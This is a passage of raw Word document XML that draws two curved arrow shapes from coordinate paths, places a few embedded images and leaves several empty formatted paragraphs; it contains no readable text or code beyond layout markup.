                                  <a:pt x="0" y="2060447"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="31620" y="2063250"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="30479" y="2075941"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="43179" y="2076958"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44312" y="2064375"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31620" y="2063250"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="44312" y="2064375"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="43271" y="2075941"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="43179" y="2076958"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="69900" y="2076958"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75945" y="2067178"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44312" y="2064375"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="1533651" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1397508" y="4190"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1331086" y="8381"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1266190" y="14224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1202562" y="21462"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1140459" y="30734"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1079881" y="41528"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1021798" y="54117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="963421" y="69087"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="907795" y="85725"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="854074" y="104648"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="802005" y="125729"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="752094" y="149098"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="704087" y="174878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="658241" y="203073"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="614553" y="233806"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="573023" y="267080"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="533654" y="303022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="496569" y="341249"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="461518" y="381888"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428370" y="424814"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="397256" y="469773"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="367919" y="517016"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="340359" y="566165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="314451" y="617219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="290321" y="670178"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="267461" y="724915"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246380" y="781303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="226568" y="839342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="208153" y="898778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="175006" y="1022095"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="146431" y="1150619"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="121665" y="1283462"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100456" y="1420240"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="81914" y="1560194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65658" y="1702689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="51053" y="1847088"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31620" y="2063250"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44312" y="2064375"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63753" y="1848358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="78231" y="1704085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="94614" y="1561845"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="113029" y="1422145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="133998" y="1287043"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="158591" y="1154572"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="187334" y="1025285"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="220351" y="902476"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238632" y="843279"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="258314" y="785647"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="279272" y="729614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="301896" y="675393"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="325881" y="622807"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="351396" y="572284"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="378554" y="523876"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="407492" y="477324"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="438761" y="432152"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="471174" y="390045"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="506087" y="349757"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="542424" y="312292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="580961" y="277012"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="621537" y="244451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="621846" y="244234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="622021" y="244063"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="622292" y="243847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="665353" y="213613"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="710267" y="185984"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="710442" y="185984"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757942" y="160358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="806828" y="137466"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="857946" y="116742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="910850" y="98144"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="911516" y="97961"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="966527" y="81349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1023294" y="66736"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1025032" y="66343"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1081758" y="54117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082080" y="54117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1142166" y="43224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1143673" y="42987"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1203405" y="34174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1203992" y="34174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1267333" y="26797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1331976" y="21093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1331804" y="21093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1397890" y="16780"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1397337" y="16780"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1533779" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1914991" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1819020" y="6603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1674368" y="1142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1533651" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="710442" y="185984"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="710267" y="185984"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="709023" y="186750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="710252" y="186113"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="710442" y="185984"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="1914991" y="12700"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1533779" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1674240" y="13715"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1673986" y="13715"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1818258" y="19303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1965959" y="28701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2117959" y="41528"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2117727" y="41528"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2269109" y="56641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2423668" y="73787"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2735453" y="111505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2736976" y="98805"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2270506" y="43941"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2117724" y="28701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1966975" y="16001"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1914991" y="12700"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="968445" y="80839"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="966492" y="81349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="966745" y="81349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="968445" y="80839"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="1025042" y="66343"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1023255" y="66736"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1023508" y="66736"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1025042" y="66343"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="1082135" y="54117"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1081758" y="54117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1080055" y="54484"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082135" y="54117"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="1143687" y="42987"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1142120" y="43224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1142373" y="43224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1143687" y="42987"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="1203992" y="34174"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1203405" y="34174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1201206" y="34498"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1203992" y="34174"/>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0" y="4590038"/>
                            <a:ext cx="921385" cy="911225"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="921385" h="911225">
                                <a:moveTo>
                                  <a:pt x="726182" y="876076"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="709294" y="902969"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="794004" y="911224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="776726" y="882776"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="736854" y="882776"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="726182" y="876076"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="921385" h="911225">
                                <a:moveTo>
                                  <a:pt x="732937" y="865320"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="726182" y="876076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="736854" y="882776"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="743711" y="872108"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732937" y="865320"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="921385" h="911225">
                                <a:moveTo>
                                  <a:pt x="749808" y="838453"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="732937" y="865320"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="743711" y="872108"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="736854" y="882776"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="776726" y="882776"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="749808" y="838453"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="921385" h="911225">
                                <a:moveTo>
                                  <a:pt x="919987" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="671703" y="27431"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="552704" y="42544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="476758" y="53466"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="404114" y="65023"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="335534" y="77723"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271779" y="91566"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="212978" y="106679"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="160147" y="123316"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="113665" y="141604"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74167" y="161797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42417" y="184150"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14223" y="215645"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="761" y="251586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="267207"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="273024"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="541" y="273927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="634" y="275081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12445" y="316356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="32003" y="351027"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="59435" y="387476"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="94234" y="425450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="136016" y="465073"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="183896" y="505967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237235" y="548258"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="295528" y="591692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="358266" y="636269"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="391033" y="658875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="424687" y="681735"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="459104" y="704722"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="566039" y="774445"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="726182" y="876076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732937" y="865320"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="573023" y="763777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="501141" y="717168"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="431799" y="671194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="398272" y="648461"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="365505" y="625855"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="333755" y="603503"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296403" y="576647"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="244983" y="538226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213340" y="513533"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="167512" y="475741"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123200" y="435990"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="85452" y="397854"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55384" y="362121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="32125" y="327025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16022" y="288416"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="15941" y="288137"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="15875" y="287908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14444" y="281520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13284" y="273927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13208" y="273433"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13146" y="273024"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12751" y="267207"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12795" y="259333"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13406" y="253626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13507" y="252689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14510" y="247269"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14604" y="246760"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16277" y="240791"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16382" y="240410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18795" y="234060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21045" y="229488"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21963" y="227579"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24975" y="222200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29082" y="216280"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29656" y="215645"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38256" y="205323"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="80389" y="172918"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="118617" y="153343"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163112" y="135751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="216408" y="118998"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="274573" y="103885"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="338073" y="90169"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="441959" y="71627"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="516128" y="60451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="632967" y="44957"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="921258" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="919987" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="921385" h="911225">
                                <a:moveTo>
                                  <a:pt x="191555" y="126267"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="189257" y="126949"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189509" y="126949"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="191555" y="12626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A4ECF2" id="Group 169" o:spid="_x0000_s1026" style="position:absolute;margin-left:121.8pt;margin-top:1.45pt;width:746.4pt;height:512.9pt;z-index:-17967104;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="94792,6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">
                <v:shape id="Image 170" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:2073;width:86838;height:6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">
                  <v:imagedata r:id="rId71" o:title=""/>
                </v:shape>
                <v:shape id="Image 171" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:16488;top:1418;width:61634;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">
                  <v:imagedata r:id="rId72" o:title=""/>
                </v:shape>
                <v:shape id="Image 172" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:79046;top:3028;width:254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">
                  <v:imagedata r:id="rId73" o:title=""/>
                </v:shape>
                <v:shape id="Image 173" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:82503;top:1586;width:12289;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">
                  <v:imagedata r:id="rId77" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 174" o:spid="_x0000_s1031" style="position:absolute;left:15554;top:19476;width:27375;height:21400;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2737485,21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" path="m,2060447r31114,79249l69900,2076958r-26721,l30479,2075941r1040,-11566l31620,2063250,,2060447xem31620,2063250r-1141,12691l43179,2076958r1133,-12583l31620,2063250xem44312,2064375r-1041,11566l43179,2076958r26721,l75945,2067178r-31633,-2803xem1533651,l1397508,4190r-66422,4191l1266190,14224r-63628,7238l1140459,30734r-60578,10794l1021798,54117,963421,69087,907795,85725r-53721,18923l802005,125729r-49911,23369l704087,174878r-45846,28195l614553,233806r-41530,33274l533654,303022r-37085,38227l461518,381888r-33148,42926l397256,469773r-29337,47243l340359,566165r-25908,51054l290321,670178r-22860,54737l246380,781303r-19812,58039l208153,898778r-33147,123317l146431,1150619r-24766,132843l100456,1420240,81914,1560194,65658,1702689,51053,1847088,31620,2063250r12692,1125l63753,1848358,78231,1704085,94614,1561845r18415,-139700l133998,1287043r24593,-132471l187334,1025285,220351,902476r18281,-59197l258314,785647r20958,-56033l301896,675393r23985,-52586l351396,572284r27158,-48408l407492,477324r31269,-45172l471174,390045r34913,-40288l542424,312292r38537,-35280l621537,244451r309,-217l622021,244063r271,-216l665353,213613r44914,-27629l710442,185984r47500,-25626l806828,137466r51118,-20724l910850,98144r666,-183l966527,81349r56767,-14613l1025032,66343r56726,-12226l1082080,54117r60086,-10893l1143673,42987r59732,-8813l1203992,34174r63341,-7377l1331976,21093r-172,l1397890,16780r-553,l1533779,12700r381212,l1819020,6603,1674368,1142,1533651,xem710442,185984r-175,l709023,186750r1229,-637l710442,185984xem1914991,12700r-381212,l1674240,13715r-254,l1818258,19303r147701,9398l2117959,41528r-232,l2269109,56641r154559,17146l2735453,111505r1523,-12700l2270506,43941,2117724,28701,1966975,16001r-51984,-3301xem968445,80839r-1953,510l966745,81349r1700,-510xem1025042,66343r-1787,393l1023508,66736r1534,-393xem1082135,54117r-377,l1080055,54484r2080,-367xem1143687,42987r-1567,237l1142373,43224r1314,-237xem1203992,34174r-587,l1201206,34498r2786,-324xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 175" o:spid="_x0000_s1032" style="position:absolute;top:45900;width:9213;height:9112;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="921385,9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" path="m726182,876076r-16888,26893l794004,911224,776726,882776r-39872,l726182,876076xem732937,865320r-6755,10756l736854,882776r6857,-10668l732937,865320xem749808,838453r-16871,26867l743711,872108r-6857,10668l776726,882776,749808,838453xem919987,l671703,27431,552704,42544,476758,53466,404114,65023,335534,77723,271779,91566r-58801,15113l160147,123316r-46482,18288l74167,161797,42417,184150,14223,215645,761,251586,,267207r469,5817l541,273927r93,1154l12445,316356r19558,34671l59435,387476r34799,37974l136016,465073r47880,40894l237235,548258r58293,43434l358266,636269r32767,22606l424687,681735r34417,22987l566039,774445,726182,876076r6755,-10756l573023,763777,501141,717168,431799,671194,398272,648461,365505,625855,333755,603503,296403,576647,244983,538226,213340,513533,167512,475741,123200,435990,85452,397854,55384,362121,32125,327025,16022,288416r-81,-279l15875,287908r-1431,-6388l13284,273927r-76,-494l13146,273024r-395,-5817l12795,259333r611,-5707l13507,252689r1003,-5420l14604,246760r1673,-5969l16382,240410r2413,-6350l21045,229488r918,-1909l24975,222200r4107,-5920l29656,215645r8600,-10322l80389,172918r38228,-19575l163112,135751r53296,-16753l274573,103885,338073,90169,441959,71627,516128,60451,632967,44957,921258,12700,919987,xem191555,126267r-2298,682l189509,126949r2046,-682xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="072EAC01" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24896640" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46246E74" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EAE43BC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E697D34" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF5221D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
